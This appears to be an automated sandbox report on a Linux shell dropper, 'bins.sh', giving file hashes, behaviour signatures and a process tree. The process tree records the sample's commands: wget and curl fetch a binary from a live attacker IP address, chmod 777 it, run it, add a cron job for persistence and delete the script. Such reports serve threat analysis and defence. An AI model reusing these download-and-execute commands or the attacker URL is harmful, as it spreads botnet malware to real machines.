Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 14:47
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
98ea8d25a8c60fccde5438d8bf5ba354
-
SHA1
7a43e84359c15813811551a39082b6554f68aa4f
-
SHA256
7d5ad7e7a8039897497a1455116d634fce3679e95c41f4d6cd41ec9ae5a5432a
-
SHA512
f575df135fbcd30f422a6c454e83d15c7013d744655490a4f4212d4a322721a7e058cdb86ff42dce19219c470d03c971b2266aa40bd90ce6a91530c7f3dab1d7
-
SSDEEP
192:w/R/1/Iz/zU1ubByo1JC7jUYg8X/Iobss4/R/1/Iz/zRbig8X/IoM1JC7jB:w5dkw1uyo1JC7jUYg8vIobO5dkIg8vIS
Malware Config
Signatures
-
Contacts a large (2198) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1499 chmod -
Executes dropped EXE 1 IoCs
Processes:
PZZBvluhwhSO2p8iibQDofx2gfTy59AqVWioc pid process /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW 1500 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW -
Renames itself 1 IoCs
Processes:
PZZBvluhwhSO2p8iibQDofx2gfTy59AqVWpid process 1501 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.mMfH5s crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
PZZBvluhwhSO2p8iibQDofx2gfTy59AqVWdescription ioc process File opened for reading /proc/1622/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1669/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1716/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1727/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/26/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1542/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1714/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/157/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1573/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1723/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1767/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1136/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1689/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1165/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1719/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/89/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/167/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1650/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1117/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1522/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1692/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1738/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1783/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/2/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/409/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1518/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1644/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1630/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1652/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1524/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1603/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1642/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/755/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1011/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/85/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1742/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/595/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1523/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1778/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1574/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/29/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1242/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1790/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1038/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1145/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1579/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1599/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/902/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1559/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1620/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1677/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1017/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1534/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1616/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1788/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/160/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/670/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1651/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1610/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1635/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/463/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1539/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1582/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW File opened for reading /proc/1718/cmdline PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW wget File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW curl File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1483
-
/bin/rm/bin/rm bins.sh2⤵PID:1484
-
/usr/bin/wgetwget http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Writes file to tmp directory
PID:1485 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Writes file to tmp directory
PID:1497 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Writes file to tmp directory
PID:1498 -
/bin/chmodchmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- File and Directory Permissions Modification
PID:1499 -
/tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1500 -
/bin/shsh -c "crontab -l"3⤵PID:1502
-
/usr/bin/crontabcrontab -l4⤵PID:1503
-
/bin/shsh -c "crontab -"3⤵PID:1504
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1505 -
/bin/rmrm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵PID:1507
-
/usr/bin/wgetwget http://87.120.84.230/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵PID:1510
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD52e80a334e05aa20a53af27ec4be2403a
SHA1ecb2d49803eaccad994536b0f0fbbdd7ffd31222
SHA2568b47c5f544e3dcb7fc47b705475d4190fcedd3b1ee3703dec7617d42690b6a8e
SHA512ce995d1b4cbc676c8f29a49df69c477762b07b008329f0abf5ec8e1cbfa88d0a185ee92b8d1cd8a223bde1d0c477c5b9cbcf442822ac5c73da44817ef44e3b17